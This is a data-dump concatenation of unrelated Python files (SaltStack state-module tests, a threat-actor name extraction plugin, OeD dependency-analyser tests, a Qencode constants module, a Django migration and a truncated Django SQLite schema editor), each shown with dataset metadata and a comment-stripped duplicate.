state,
'_set'
'_retcode',
mock):
self.assertTrue(state.
highstate
(arg))
def test_clear_request(self):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.payload, 'Serial', mock):
mock = MagicMock(side_effect=[False, True, True])
with patch.object(os.path, 'isfile', mock):
self.assertTrue(state.clear_request("A"))
mock = MagicMock(return_value=True)
with patch.object(os, 'remove', mock):
self.assertTrue(state.clear_request())
mock = MagicMock(return_value={})
with patch.object(state, 'check_request', mock):
self.assertFalse(state.clear_request("A"))
def test_check_request(self):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock), \
patch('salt.modules.state.salt.payload', MockSerial):
mock = MagicMock(side_effect=[True, True, False])
with patch.object(os.path, 'isfile', mock):
with patch('salt.utils.files.fopen', mock_open()):
self.assertDictEqual(state.check_request(), {'A': 'B'})
with patch('salt.utils.files.fopen', mock_open()):
self.assertEqual(state.check_request("A"), 'B')
self.assertDictEqual(state.check_request(), {})
def test_request(self):
mock = MagicMock(return_value=True)
with patch.object(state, 'apply_', mock):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=
{"test_run": "",
"mods": "",
"kwargs": ""})
with patch.object(state, 'check_request', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
with patch.object(salt.utils.platform, 'is_windows', mock):
with patch.dict(state.__salt__, {'cmd.run': mock}):
with patch('salt.utils.files.fopen', mock_open()):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
self.assertTrue(state.request("A"))
def test_sls(self):
arg = "core,edit.vim dev"
ret = ['Pillar failed to render with the following messages:', 'E', '1']
mock = MagicMock(return_value=True)
with patch.object(state, 'running', mock):
with patch.dict(state.__context__, {"retcode": 1}):
self.assertEqual(state.sls("core,edit.vim dev"), True)
mock = MagicMock(side_effect=[True, True, True, True, True, True])
with patch.object(state, '_wait', mock):
mock = MagicMock(side_effect=[["A"], [], [], [], [], []])
with patch.object(state, '_disabled', mock):
with patch.dict(state.__context__, {"retcode": 1}):
self.assertEqual(
state.sls("core,edit.vim dev",
None,
None,
True),
["A"])
mock = MagicMock(side_effect=[False,
True,
True,
True,
True])
with patch.object(state, '_check_pillar', mock):
with patch.dict(state.__context__, {"retcode": 5}):
with patch.dict(state.__pillar__, {"_errors": "E1"}):
self.assertListEqual(state.sls("core,edit.vim dev",
None,
None,
True), ret)
with patch.dict(state.__opts__, {"test": None}):
mock = MagicMock(return_value={"test": "",
"environment": None})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils,
'test_mode',
mock):
self.assertRaises(
SaltInvocationError,
state.sls,
"core,edit.vim dev",
None,
None,
True,
pillar="A")
mock = MagicMock(return_value="/D/cache.cache.p")
with patch.object(os.path,
'join',
mock):
mock = MagicMock(return_value=True)
with patch.object(os.path,
'isfile',
mock):
with patch(
'salt.utils.files.fopen',
mock_open()):
self.assertTrue(
state.sls(arg,
None,
None,
True,
cache
=True
)
)
MockState.HighState.flag = True
self.assertTrue(state.sls("core,edit"
".vim dev",
None,
None,
True)
)
MockState.HighState.flag = False
mock = MagicMock(return_value=True)
with patch.dict(state.__salt__,
{'config.option':
mock}):
mock = MagicMock(return_value=
True)
with patch.object(
state,
'_filter_'
'running',
mock):
self.sub_test_sls()
def sub_test_sls(self):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
with patch.object(os, 'umask', mock):
mock = MagicMock(return_value=False)
with patch.object(salt.utils.platform, 'is_windows', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
with patch.object(state, '_set_retcode', mock):
with patch.dict(state.__opts__,
{"test": True}):
with patch('salt.utils.files.fopen', mock_open()):
self.assertTrue(state.sls("core,edit"
".vim dev",
None,
None,
True))
def test_pkg(self):
tar_file = os.sep + os.path.join('tmp', 'state_pkg.tgz')
mock = MagicMock(side_effect=[False, True, True, True, True, True, True, True])
with patch.object(os.path, 'isfile', mock), \
patch('salt.modules.state.tarfile', MockTarFile), \
patch('salt.modules.state.json', MockJson()):
self.assertEqual(state.pkg(tar_file, "", "md5"), {})
mock = MagicMock(side_effect=[False, 0, 0, 0, 0])
with patch.object(salt.utils.hashutils, 'get_hash', mock):
self.assertDictEqual(state.pkg(tar_file, "", "md5"), {})
self.assertDictEqual(state.pkg(tar_file, 0, "md5"), {})
MockTarFile.path = ""
MockJson.flag = True
with patch('salt.utils.files.fopen', mock_open()):
self.assertListEqual(state.pkg(tar_file, 0, "md5"), [True])
MockTarFile.path = ""
MockJson.flag = False
if six.PY2:
with patch('salt.utils.files.fopen', mock_open()), \
patch.dict(state.__utils__, {'state.check_result': MagicMock(return_value=True)}):
self.assertTrue(state.pkg(tar_file, 0, "md5"))
else:
with patch('salt.utils.files.fopen', mock_open()):
self.assertTrue(state.pkg(tar_file, 0, "md5"))
| true | true |
f723520e4799d2f7b850bf3560c2a44ea951ed9f | 1,141 | py | Python | act/scio/plugins/threatactor_pattern.py | martineian/act-scio2 | 2f103581cf7e340a1f3f7ba58038ac256c025425 | [
"0BSD"
] | null | null | null | act/scio/plugins/threatactor_pattern.py | martineian/act-scio2 | 2f103581cf7e340a1f3f7ba58038ac256c025425 | [
"0BSD"
] | null | null | null | act/scio/plugins/threatactor_pattern.py | martineian/act-scio2 | 2f103581cf7e340a1f3f7ba58038ac256c025425 | [
"0BSD"
] | null | null | null | import addict
from act.scio.aliasregex import normalize
from act.scio.vocabulary import Vocabulary
from act.scio.plugin import BasePlugin, Result
from typing import Text, List
import configparser
import os.path
def normalize_ta(name: Text) -> Text:
return normalize(
name,
capitalize=True,
uppercase_abbr=["APT", "BRONZE", "IRON", "GOLD"],
)
class Plugin(BasePlugin):
name = "threatactor"
info = "Extracting references to known threat actors from a body of text"
version = "0.2"
dependencies: List[Text] = []
async def analyze(self, nlpdata: addict.Dict) -> Result:
ini = configparser.ConfigParser()
ini.read([os.path.join(self.configdir, "threatactor_pattern.ini")])
ini['threat_actor']['alias'] = os.path.join(self.configdir, ini['threat_actor']['alias'])
vocab = Vocabulary(ini['threat_actor'])
res = addict.Dict()
res.ThreatActors = vocab.regex_search(
nlpdata.content,
normalize_result=normalize_ta,
debug=self.debug)
return Result(name=self.name, version=self.version, result=res)
| 28.525 | 97 | 0.66433 | import addict
from act.scio.aliasregex import normalize
from act.scio.vocabulary import Vocabulary
from act.scio.plugin import BasePlugin, Result
from typing import Text, List
import configparser
import os.path
def normalize_ta(name: Text) -> Text:
return normalize(
name,
capitalize=True,
uppercase_abbr=["APT", "BRONZE", "IRON", "GOLD"],
)
class Plugin(BasePlugin):
name = "threatactor"
info = "Extracting references to known threat actors from a body of text"
version = "0.2"
dependencies: List[Text] = []
async def analyze(self, nlpdata: addict.Dict) -> Result:
ini = configparser.ConfigParser()
ini.read([os.path.join(self.configdir, "threatactor_pattern.ini")])
ini['threat_actor']['alias'] = os.path.join(self.configdir, ini['threat_actor']['alias'])
vocab = Vocabulary(ini['threat_actor'])
res = addict.Dict()
res.ThreatActors = vocab.regex_search(
nlpdata.content,
normalize_result=normalize_ta,
debug=self.debug)
return Result(name=self.name, version=self.version, result=res)
| true | true |
f72352bb629d63729cc732c1f349130e7d89a441 | 2,813 | py | Python | tests/usecases/test_test_oed.py | fchauvel/oed | 80bf38e3d2879aa403edbdb3cf91d51dde2e9edc | [
"MIT"
] | null | null | null | tests/usecases/test_test_oed.py | fchauvel/oed | 80bf38e3d2879aa403edbdb3cf91d51dde2e9edc | [
"MIT"
] | null | null | null | tests/usecases/test_test_oed.py | fchauvel/oed | 80bf38e3d2879aa403edbdb3cf91d51dde2e9edc | [
"MIT"
] | null | null | null | #
# OeD - Open-ended Dependency Analyser
#
# Copyright (C) 2020 -- 2021 SINTEF Digital
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
#
from oed import OeD
from oed.laboratory import Laboratory
from oed.engines.os import OSPlatform
from oed.engines.vcs import RepositoryFactory, Github
from json import load as load_json_from
from tests.usecases.stubs import PackagesStub
from unittest import TestCase
class FakeGithub(Github):
def __init__(self, organization, project):
super().__init__(organization, project)
def _request_all_tags(self):
print("Using test data", self._SAMPLE_GITHUB_TAGS)
with open(self._SAMPLE_GITHUB_TAGS, "r") as sample_tags:
return load_json_from(sample_tags)
_SAMPLE_GITHUB_TAGS = "tests/data/sample_github_tags.json"
class TestPlatform(OSPlatform):
def __init__(self):
super().__init__(workspace=None, repositories=RepositoryFactory([FakeGithub]))
def _execute_script(self):
return self._sample_output()
#return self._minimal_relevant_output()
def _sample_output(self):
with open("tests/data/sample_pytest_output.log",
"r", encoding="utf-16") as sample_output:
return sample_output.readlines()
def _minimal_relevant_output(self):
return [
"= 1 failed, 1537 passed, 24 skipped, 8 xfailed, 25 xpassed, 7 warnings in 325.63s (0:05:25) \n",
"TOTAL 36332 6040 13652 1471 81%\n"
]
def _fetch_content(self, url):
with open(self.SAMPLE_WEBPAGE, "r", encoding="iso-8859-1") as htmlfile:
return htmlfile.read()
SAMPLE_WEBPAGE = "tests/data/sphinx_homepage.html"
class TestOeD(TestCase):
def setUp(self):
packages = PackagesStub()
laboratory = Laboratory(platform=TestPlatform())
self.system = OeD(packages, laboratory)
def test_success_scenario(self):
session = self.system.new_testing_session()
requirements = self.system.select("Sphinx", "1.0", "alabaster")
session.add(requirements)
session.start()
experiments = self.system.experiments.select(lambda r: r.subject == "sphinx==1.0" \
and r.object == "alabaster==1.0")
self.assertEqual(1, len(experiments))
self.assertTrue(experiments[0].is_complete)
self.assertEqual(1595, experiments[0].results.tests.count)
self.assertAlmostEqual(81.0, experiments[0].results.tests.coverage,
delta=0.5)
# 1 failed, 1537 passed, 24 skipped, 8 xfailed, 25 xpassed,
| 30.576087 | 109 | 0.64593 |
from oed import OeD
from oed.laboratory import Laboratory
from oed.engines.os import OSPlatform
from oed.engines.vcs import RepositoryFactory, Github
from json import load as load_json_from
from tests.usecases.stubs import PackagesStub
from unittest import TestCase
class FakeGithub(Github):
def __init__(self, organization, project):
super().__init__(organization, project)
def _request_all_tags(self):
print("Using test data", self._SAMPLE_GITHUB_TAGS)
with open(self._SAMPLE_GITHUB_TAGS, "r") as sample_tags:
return load_json_from(sample_tags)
_SAMPLE_GITHUB_TAGS = "tests/data/sample_github_tags.json"
class TestPlatform(OSPlatform):
def __init__(self):
super().__init__(workspace=None, repositories=RepositoryFactory([FakeGithub]))
def _execute_script(self):
return self._sample_output()
def _sample_output(self):
with open("tests/data/sample_pytest_output.log",
"r", encoding="utf-16") as sample_output:
return sample_output.readlines()
def _minimal_relevant_output(self):
return [
"= 1 failed, 1537 passed, 24 skipped, 8 xfailed, 25 xpassed, 7 warnings in 325.63s (0:05:25) \n",
"TOTAL 36332 6040 13652 1471 81%\n"
]
def _fetch_content(self, url):
with open(self.SAMPLE_WEBPAGE, "r", encoding="iso-8859-1") as htmlfile:
return htmlfile.read()
SAMPLE_WEBPAGE = "tests/data/sphinx_homepage.html"
class TestOeD(TestCase):
def setUp(self):
packages = PackagesStub()
laboratory = Laboratory(platform=TestPlatform())
self.system = OeD(packages, laboratory)
def test_success_scenario(self):
session = self.system.new_testing_session()
requirements = self.system.select("Sphinx", "1.0", "alabaster")
session.add(requirements)
session.start()
experiments = self.system.experiments.select(lambda r: r.subject == "sphinx==1.0" \
and r.object == "alabaster==1.0")
self.assertEqual(1, len(experiments))
self.assertTrue(experiments[0].is_complete)
self.assertEqual(1595, experiments[0].results.tests.count)
self.assertAlmostEqual(81.0, experiments[0].results.tests.coverage,
delta=0.5)
| true | true |
f723539640b2e7f42a07839479e26f422c6bdce6 | 511 | py | Python | tests/rules/test_java.py | frankhli843/thedarn | 9e00f854c248156fba820f39b2834e8273583984 | [
"MIT"
] | null | null | null | tests/rules/test_java.py | frankhli843/thedarn | 9e00f854c248156fba820f39b2834e8273583984 | [
"MIT"
] | null | null | null | tests/rules/test_java.py | frankhli843/thedarn | 9e00f854c248156fba820f39b2834e8273583984 | [
"MIT"
] | null | null | null | import pytest
from thedarn.rules.java import match, get_new_command
from thedarn.types import Command
@pytest.mark.parametrize('command', [
Command('java foo.java', ''),
Command('java bar.java', '')])
def test_match(command):
assert match(command)
@pytest.mark.parametrize('command, new_command', [
(Command('java foo.java', ''), 'java foo'),
(Command('java bar.java', ''), 'java bar')])
def test_get_new_command(command, new_command):
assert get_new_command(command) == new_command
| 28.388889 | 53 | 0.700587 | import pytest
from thedarn.rules.java import match, get_new_command
from thedarn.types import Command
@pytest.mark.parametrize('command', [
Command('java foo.java', ''),
Command('java bar.java', '')])
def test_match(command):
assert match(command)
@pytest.mark.parametrize('command, new_command', [
(Command('java foo.java', ''), 'java foo'),
(Command('java bar.java', ''), 'java bar')])
def test_get_new_command(command, new_command):
assert get_new_command(command) == new_command
| true | true |
f72355e351b3bf3fb5c4715c734eb3925fc41ea8 | 753 | py | Python | qencode/const.py | peergradeio/qencode-api-python-client | c46ababbb02b164005c0c7c90b189ed5e24659bb | [
"MIT"
] | 9 | 2019-06-24T19:57:11.000Z | 2020-12-21T22:25:23.000Z | qencode/const.py | peergradeio/qencode-api-python-client | c46ababbb02b164005c0c7c90b189ed5e24659bb | [
"MIT"
] | 10 | 2020-07-06T22:34:14.000Z | 2022-02-24T22:16:05.000Z | qencode/const.py | peergradeio/qencode-api-python-client | c46ababbb02b164005c0c7c90b189ed5e24659bb | [
"MIT"
] | 5 | 2020-05-06T12:35:42.000Z | 2020-11-12T08:50:32.000Z | REPEAT = 32
SLEEP_REGULAR = 10
SLEEP_ERROR = 60
COMPLETED_STATUS = ['completed', 'saved']
ERROR_OK = 0
ERROR_SERVER_INTERNAL = 1
ERROR_BAD_APP_ID = 2
ERROR_APP_ID_NOT_FOUND = 3
ERROR_BAD_TOKEN = 4
ERROR_TOKEN_NOT_FOUND = 5
ERROR_TARIFF_NOT_PAID = 6
ERROR_MASTER_NOT_FOUND = 7
ERROR_SYSTEM_BUSY = 8
ERROR_BAD_PAYLOAD = 9
ERROR_PROJECT_NOT_FOUND = 10
ERROR_BAD_PROFILE = 11
ERROR_PROFILE_NOT_FOUND = 12
ERROR_BAD_TOKENS = 13
ERROR_FIELD_REQUIRED = 14
FPS_DRM_KEYGENERATOR_URI_TEMPLATE = (
'https://cpix.ezdrm.com/KeyGenerator/cpix.aspx?k=%s&u=%s&p=%s&c=resourcename&m=2'
)
CENC_DRM_KEYGENERATOR_URI_TEMPLATE = (
'https://cpix.ezdrm.com/KeyGenerator/cpix.aspx?k=%s&u=%s&p=%s&c=resourcename&m=1'
)
DRM_KEY_URL_TEMPLATE = 'skd://fps.ezdrm.com/;%s'
| 25.965517 | 85 | 0.774236 | REPEAT = 32
SLEEP_REGULAR = 10
SLEEP_ERROR = 60
COMPLETED_STATUS = ['completed', 'saved']
ERROR_OK = 0
ERROR_SERVER_INTERNAL = 1
ERROR_BAD_APP_ID = 2
ERROR_APP_ID_NOT_FOUND = 3
ERROR_BAD_TOKEN = 4
ERROR_TOKEN_NOT_FOUND = 5
ERROR_TARIFF_NOT_PAID = 6
ERROR_MASTER_NOT_FOUND = 7
ERROR_SYSTEM_BUSY = 8
ERROR_BAD_PAYLOAD = 9
ERROR_PROJECT_NOT_FOUND = 10
ERROR_BAD_PROFILE = 11
ERROR_PROFILE_NOT_FOUND = 12
ERROR_BAD_TOKENS = 13
ERROR_FIELD_REQUIRED = 14
FPS_DRM_KEYGENERATOR_URI_TEMPLATE = (
'https://cpix.ezdrm.com/KeyGenerator/cpix.aspx?k=%s&u=%s&p=%s&c=resourcename&m=2'
)
CENC_DRM_KEYGENERATOR_URI_TEMPLATE = (
'https://cpix.ezdrm.com/KeyGenerator/cpix.aspx?k=%s&u=%s&p=%s&c=resourcename&m=1'
)
DRM_KEY_URL_TEMPLATE = 'skd://fps.ezdrm.com/;%s'
| true | true |
f72355eeda4659e76ec7ec6a6e9be9c0433cbe74 | 1,829 | py | Python | NewsFeed/migrations/0001_initial.py | 1104028/StrativNewsFeed | 4499cbb17141ca1aa19d3fd00071828ff9ab3d7a | [
"Python-2.0",
"OLDAP-2.3"
] | null | null | null | NewsFeed/migrations/0001_initial.py | 1104028/StrativNewsFeed | 4499cbb17141ca1aa19d3fd00071828ff9ab3d7a | [
"Python-2.0",
"OLDAP-2.3"
] | null | null | null | NewsFeed/migrations/0001_initial.py | 1104028/StrativNewsFeed | 4499cbb17141ca1aa19d3fd00071828ff9ab3d7a | [
"Python-2.0",
"OLDAP-2.3"
] | null | null | null | # Generated by Django 3.2.9 on 2021-11-23 14:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Countries',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('countryName', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Keywords',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('keyword', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Sources',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sourceName', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Mapper',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('itemName', models.CharField(max_length=100)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 36.58 | 118 | 0.585019 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Countries',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('countryName', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Keywords',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('keyword', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Sources',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sourceName', models.CharField(max_length=100)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Mapper',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('itemName', models.CharField(max_length=100)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
f72357e45901d3bd648fdb6e6edab0bcae3bad14 | 13,930 | py | Python | oadenv/lib/python2.7/site-packages/django/db/backends/sqlite3/schema.py | isabernardes/Archaeodatabase | 86090e8f840d5d202c15906e614d683f8a12d3bc | [
"MIT"
] | 7 | 2017-02-12T06:03:00.000Z | 2020-12-31T11:57:35.000Z | oadenv/lib/python2.7/site-packages/django/db/backends/sqlite3/schema.py | isabernardes/Archaeodatabase | 86090e8f840d5d202c15906e614d683f8a12d3bc | [
"MIT"
] | 10 | 2017-07-13T00:24:03.000Z | 2017-07-17T07:39:03.000Z | oadenv/lib/python2.7/site-packages/django/db/backends/sqlite3/schema.py | isabernardes/Archaeodatabase | 86090e8f840d5d202c15906e614d683f8a12d3bc | [
"MIT"
] | 7 | 2017-08-01T04:02:07.000Z | 2018-10-06T21:07:20.000Z | import codecs
import contextlib
import copy
from decimal import Decimal
from django.apps.registry import Apps
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.utils import six
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_delete_table = "DROP TABLE %(table)s"
sql_create_inline_fk = "REFERENCES %(to_table)s (%(to_column)s)"
sql_create_unique = "CREATE UNIQUE INDEX %(name)s ON %(table)s (%(columns)s)"
sql_delete_unique = "DROP INDEX %(name)s"
def __enter__(self):
with self.connection.cursor() as c:
# Some SQLite schema alterations need foreign key constraints to be
# disabled. This is the default in SQLite but can be changed with a
# build flag and might change in future, so can't be relied upon.
# We enforce it here for the duration of the transaction.
c.execute('PRAGMA foreign_keys')
self._initial_pragma_fk = c.fetchone()[0]
c.execute('PRAGMA foreign_keys = 0')
return super(DatabaseSchemaEditor, self).__enter__()
def __exit__(self, exc_type, exc_value, traceback):
super(DatabaseSchemaEditor, self).__exit__(exc_type, exc_value, traceback)
with self.connection.cursor() as c:
# Restore initial FK setting - PRAGMA values can't be parametrized
c.execute('PRAGMA foreign_keys = %s' % int(self._initial_pragma_fk))
def quote_value(self, value):
# The backend "mostly works" without this function and there are use
# cases for compiling Python without the sqlite3 libraries (e.g.
# security hardening).
try:
import sqlite3
value = sqlite3.adapt(value)
except ImportError:
pass
except sqlite3.ProgrammingError:
pass
# Manual emulation of SQLite parameter quoting
if isinstance(value, type(True)):
return str(int(value))
elif isinstance(value, (Decimal, float)):
return str(value)
elif isinstance(value, six.integer_types):
return str(value)
elif isinstance(value, six.string_types):
return "'%s'" % six.text_type(value).replace("\'", "\'\'")
elif value is None:
return "NULL"
elif isinstance(value, (bytes, bytearray, six.memoryview)):
# Bytes are only allowed for BLOB fields, encoded as string
# literals containing hexadecimal data and preceded by a single "X"
# character:
# value = b'\x01\x02' => value_hex = b'0102' => return X'0102'
value = bytes(value)
hex_encoder = codecs.getencoder('hex_codec')
value_hex, _length = hex_encoder(value)
# Use 'ascii' encoding for b'01' => '01', no need to use force_text here.
return "X'%s'" % value_hex.decode('ascii')
else:
raise ValueError("Cannot quote parameter value %r of type %s" % (value, type(value)))
def _remake_table(self, model, create_fields=[], delete_fields=[], alter_fields=[], override_uniques=None,
override_indexes=None):
"""
Shortcut to transform a model from old_model into new_model
The essential steps are:
1. rename the model's existing table, e.g. "app_model" to "app_model__old"
2. create a table with the updated definition called "app_model"
3. copy the data from the old renamed table to the new table
4. delete the "app_model__old" table
"""
# Self-referential fields must be recreated rather than copied from
# the old model to ensure their remote_field.field_name doesn't refer
# to an altered field.
def is_self_referential(f):
return f.is_relation and f.remote_field.model is model
# Work out the new fields dict / mapping
body = {
f.name: f.clone() if is_self_referential(f) else f
for f in model._meta.local_concrete_fields
}
# Since mapping might mix column names and default values,
# its values must be already quoted.
mapping = {f.column: self.quote_name(f.column) for f in model._meta.local_concrete_fields}
# This maps field names (not columns) for things like unique_together
rename_mapping = {}
# If any of the new or altered fields is introducing a new PK,
# remove the old one
restore_pk_field = None
if any(f.primary_key for f in create_fields) or any(n.primary_key for o, n in alter_fields):
for name, field in list(body.items()):
if field.primary_key:
field.primary_key = False
restore_pk_field = field
if field.auto_created:
del body[name]
del mapping[field.column]
# Add in any created fields
for field in create_fields:
body[field.name] = field
# Choose a default and insert it into the copy map
if not field.many_to_many and field.concrete:
mapping[field.column] = self.quote_value(
self.effective_default(field)
)
# Add in any altered fields
for (old_field, new_field) in alter_fields:
body.pop(old_field.name, None)
mapping.pop(old_field.column, None)
body[new_field.name] = new_field
if old_field.null and not new_field.null:
case_sql = "coalesce(%(col)s, %(default)s)" % {
'col': self.quote_name(old_field.column),
'default': self.quote_value(self.effective_default(new_field))
}
mapping[new_field.column] = case_sql
else:
mapping[new_field.column] = self.quote_name(old_field.column)
rename_mapping[old_field.name] = new_field.name
# Remove any deleted fields
for field in delete_fields:
del body[field.name]
del mapping[field.column]
# Remove any implicit M2M tables
if field.many_to_many and field.remote_field.through._meta.auto_created:
return self.delete_model(field.remote_field.through)
# Work inside a new app registry
apps = Apps()
# Provide isolated instances of the fields to the new model body so
# that the existing model's internals aren't interfered with when
# the dummy model is constructed.
body = copy.deepcopy(body)
# Work out the new value of unique_together, taking renames into
# account
if override_uniques is None:
override_uniques = [
[rename_mapping.get(n, n) for n in unique]
for unique in model._meta.unique_together
]
# Work out the new value for index_together, taking renames into
# account
if override_indexes is None:
override_indexes = [
[rename_mapping.get(n, n) for n in index]
for index in model._meta.index_together
]
# Construct a new model for the new state
meta_contents = {
'app_label': model._meta.app_label,
'db_table': model._meta.db_table,
'unique_together': override_uniques,
'index_together': override_indexes,
'apps': apps,
}
meta = type("Meta", tuple(), meta_contents)
body['Meta'] = meta
body['__module__'] = model.__module__
temp_model = type(model._meta.object_name, model.__bases__, body)
# We need to modify model._meta.db_table, but everything explodes
# if the change isn't reversed before the end of this method. This
# context manager helps us avoid that situation.
@contextlib.contextmanager
def altered_table_name(model, temporary_table_name):
original_table_name = model._meta.db_table
model._meta.db_table = temporary_table_name
yield
model._meta.db_table = original_table_name
with altered_table_name(model, model._meta.db_table + "__old"):
# Rename the old table to make way for the new
self.alter_db_table(model, temp_model._meta.db_table, model._meta.db_table)
# Create a new table with the updated schema. We remove things
# from the deferred SQL that match our table name, too
self.deferred_sql = [x for x in self.deferred_sql if temp_model._meta.db_table not in x]
self.create_model(temp_model)
# Copy data from the old table into the new table
field_maps = list(mapping.items())
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(temp_model._meta.db_table),
', '.join(self.quote_name(x) for x, y in field_maps),
', '.join(y for x, y in field_maps),
self.quote_name(model._meta.db_table),
))
# Delete the old table
self.delete_model(model, handle_autom2m=False)
# Run deferred SQL on correct table
for sql in self.deferred_sql:
self.execute(sql)
self.deferred_sql = []
# Fix any PK-removed field
if restore_pk_field:
restore_pk_field.primary_key = True
def delete_model(self, model, handle_autom2m=True):
if handle_autom2m:
super(DatabaseSchemaEditor, self).delete_model(model)
else:
# Delete the table (and only that)
self.execute(self.sql_delete_table % {
"table": self.quote_name(model._meta.db_table),
})
def add_field(self, model, field):
"""
Creates a field on a model.
Usually involves adding a column, but may involve adding a
table instead (for M2M fields)
"""
# Special-case implicit M2M tables
if field.many_to_many and field.remote_field.through._meta.auto_created:
return self.create_model(field.remote_field.through)
self._remake_table(model, create_fields=[field])
def remove_field(self, model, field):
"""
Removes a field from a model. Usually involves deleting a column,
but for M2Ms may involve deleting a table.
"""
# M2M fields are a special case
if field.many_to_many:
# For implicit M2M tables, delete the auto-created table
if field.remote_field.through._meta.auto_created:
self.delete_model(field.remote_field.through)
# For explicit "through" M2M fields, do nothing
# For everything else, remake.
else:
# It might not actually have a column behind it
if field.db_parameters(connection=self.connection)['type'] is None:
return
self._remake_table(model, delete_fields=[field])
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
"""Actually perform a "physical" (non-ManyToMany) field update."""
# Alter by remaking table
self._remake_table(model, alter_fields=[(old_field, new_field)])
def alter_index_together(self, model, old_index_together, new_index_together):
"""
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
"""
self._remake_table(model, override_indexes=new_index_together)
def alter_unique_together(self, model, old_unique_together, new_unique_together):
"""
Deals with a model changing its unique_together.
Note: The input unique_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
"""
self._remake_table(model, override_uniques=new_unique_together)
def _alter_many_to_many(self, model, old_field, new_field, strict):
"""
Alters M2Ms to repoint their to= endpoints.
"""
if old_field.remote_field.through._meta.db_table == new_field.remote_field.through._meta.db_table:
# The field name didn't change, but some options did; we have to propagate this altering.
self._remake_table(
old_field.remote_field.through,
alter_fields=[(
# We need the field that points to the target model, so we can tell alter_field to change it -
# this is m2m_reverse_field_name() (as opposed to m2m_field_name, which points to our model)
old_field.remote_field.through._meta.get_field(old_field.m2m_reverse_field_name()),
new_field.remote_field.through._meta.get_field(new_field.m2m_reverse_field_name()),
)],
override_uniques=(new_field.m2m_field_name(), new_field.m2m_reverse_field_name()),
)
return
# Make a new through table
self.create_model(new_field.remote_field.through)
# Copy the data across
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_field.remote_field.through._meta.db_table),
', '.join([
"id",
new_field.m2m_column_name(),
new_field.m2m_reverse_name(),
]),
', '.join([
"id",
old_field.m2m_column_name(),
old_field.m2m_reverse_name(),
]),
self.quote_name(old_field.remote_field.through._meta.db_table),
))
# Delete the old through table
self.delete_model(old_field.remote_field.through)
| 44.935484 | 114 | 0.616009 | import codecs
import contextlib
import copy
from decimal import Decimal
from django.apps.registry import Apps
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.utils import six
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_delete_table = "DROP TABLE %(table)s"
sql_create_inline_fk = "REFERENCES %(to_table)s (%(to_column)s)"
sql_create_unique = "CREATE UNIQUE INDEX %(name)s ON %(table)s (%(columns)s)"
sql_delete_unique = "DROP INDEX %(name)s"
def __enter__(self):
with self.connection.cursor() as c:
# We enforce it here for the duration of the transaction.
c.execute('PRAGMA foreign_keys')
self._initial_pragma_fk = c.fetchone()[0]
c.execute('PRAGMA foreign_keys = 0')
return super(DatabaseSchemaEditor, self).__enter__()
def __exit__(self, exc_type, exc_value, traceback):
super(DatabaseSchemaEditor, self).__exit__(exc_type, exc_value, traceback)
with self.connection.cursor() as c:
# Restore initial FK setting - PRAGMA values can't be parametrized
c.execute('PRAGMA foreign_keys = %s' % int(self._initial_pragma_fk))
def quote_value(self, value):
try:
import sqlite3
value = sqlite3.adapt(value)
except ImportError:
pass
except sqlite3.ProgrammingError:
pass
if isinstance(value, type(True)):
return str(int(value))
elif isinstance(value, (Decimal, float)):
return str(value)
elif isinstance(value, six.integer_types):
return str(value)
elif isinstance(value, six.string_types):
return "'%s'" % six.text_type(value).replace("\'", "\'\'")
